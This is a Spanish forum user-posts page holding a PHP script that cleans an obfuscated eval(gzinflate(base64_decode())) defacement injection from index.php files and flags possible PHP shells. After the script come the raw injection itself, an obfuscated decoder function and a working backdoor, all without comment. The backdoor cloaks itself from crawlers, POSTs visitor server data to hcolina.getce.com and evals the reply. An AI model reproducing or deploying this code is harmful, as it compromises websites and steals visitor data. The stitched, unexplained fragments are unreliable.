Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes Menú<?php
//script para solucionar inmediatamente el ataque deface inyection por Oliver Leuyim Angel - www.dimworks.org
function search_files( $dir , &$files )
{
if (is_dir($dir))
{
if ($gd = opendir($dir))
{
while (($file = readdir($gd)) !== false)
{
if ( $file != '.' AND $file != '..' )
{
// ¿ Dir or File ?
if ( is_dir( $dir.'/'.$file ) )
{
search_files( $dir.'/'.$file , $files );
}
else
{
// Ready File
if ( is_file( $dir.'/'.$file) )
{
if($file == 'index.php'){
$reader = file_get_contents($dir.'/'.$file,NULL,NULL,0,100);
if(stristr($reader,"eval")){
$removed = file_get_contents($dir.'/'.$file);
$removed = str_ireplace("<?php error_reporting(0); preg_replace(\"/.*/e\",\"eval(gzinflate(base64_decode('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')));\",\"\"); ?>","",$removed);
file_put_contents($dir.'/'.$file,$removed);
chmod($dir.'/'.$file,0644);
//$size = filesize( $dir.'/'.$file );
//$md5 = md5_file( $dir.'/'.$file );
$files[ dirname($dir.'/'.$file)."/".$file ] = filemtime( $dir.'/'.$file );
}
}
}
}
}
}
closedir($gd);
}
}
}
$files = array();
search_files("/home/amquere/public_html", $files );
print_r($files);
echo "<br>Archivos Limpios.";
echo "<br><hr>Posible php-shell:<br><br>";
function search_shell( $dir , &$files )
{
if (is_dir($dir))
{
if ($gd = opendir($dir))
{
while (($file = readdir($gd)) !== false)
{
if ( $file != '.' AND $file != '..' )
{
// ¿ Dir or File ?
if ( is_dir( $dir.'/'.$file ) )
{
search_shell( $dir.'/'.$file , $files );
}
else
{
// Ready File
if ( is_file( $dir.'/'.$file) )
{
if(strstr($file,"php")){
$reader = file_get_contents($dir.'/'.$file);
if(stristr($reader,"eval(")){
//$size = filesize( $dir.'/'.$file );
//$md5 = md5_file( $dir.'/'.$file );
echo dirname($dir.'/'.$file)."/".$file ." => ". filemtime( $dir.'/'.$file )."<br>\r\n";
}
}
}
}
}
}
closedir($gd);
}
}
}
$files = array();
search_shell("/home/amquere/public_html", $files );
print_r($files);
?>
<?php error_reporting(0); preg_replace("/.*/e","eval(gzinflate(base64_decode('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')));",""); ?>
function dgeoig41383($str) {
$a = "\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";
$b = "\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65";
return $b($a($str));
}
<?php ?><?php
error_reporting(0);
if (!$kjdke_b) {
global $kjdke_b;
$kjdke_b = 1;
$bkljg = $_SERVER["HTTP_USER_AGENT"];
$ghfju = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "bot", "spid", "Lynx", "PHP", "WordPress" . "integromedb", "SISTRIX", "Aggregator", "findlinks", "Xenu", "BacklinkCrawler", "Scheduler", "mod_pagespeed", "Index", "ahoo", "Tapatalk", "PubSub", "RSS");
if (!($_GET['df'] === "2") and !($_POST['dl'] === "2") and ((preg_match("/" . implode("|", $ghfju) . "/i", $bkljg)) or (@$_COOKIE['condtions']) or (!$bkljg) or ($_SERVER['HTTP_REFERER'] === "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI']) or ($_SERVER['REMOTE_ADDR'] === "127.0.0.1") or ($_SERVER['REMOTE_ADDR'] === $_SERVER['SERVER_ADDR']) or ($_GET['df'] === "1") or ($_POST['dl'] === "1"))) {
} else {
foreach ($_SERVER as $ndbv => $cbcd) {
$data_nfdh.= "&REM_" . $ndbv . "='" . base64_encode($cbcd) . "'";
}
$context_jhkb = stream_context_create(array('http' => array('timeout' => '15', 'header' => "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.9) Gecko/20100101 Firefox/10.0.9_ Iceweasel/10.0.9
Connection: Close
", 'method' => 'POST', 'content' => "REM_REM='1'" . $data_nfdh)));
$vkfu = file_get_contents("http://hcolina.getce.com/session.php?id", false, $context_jhkb);
if ($vkfu) {
eval($vkfu);
} else {
ob_start();
if (!@headers_sent()) {
@setcookie("condtions", "2", time() + 172800);
} else {
echo "<script>document.cookie='condtions=2; path=/; expires=" . date('D, d-M-Y H:i:s', time() + 172800) . " GMT;';</script>";
};
};
}
}
?>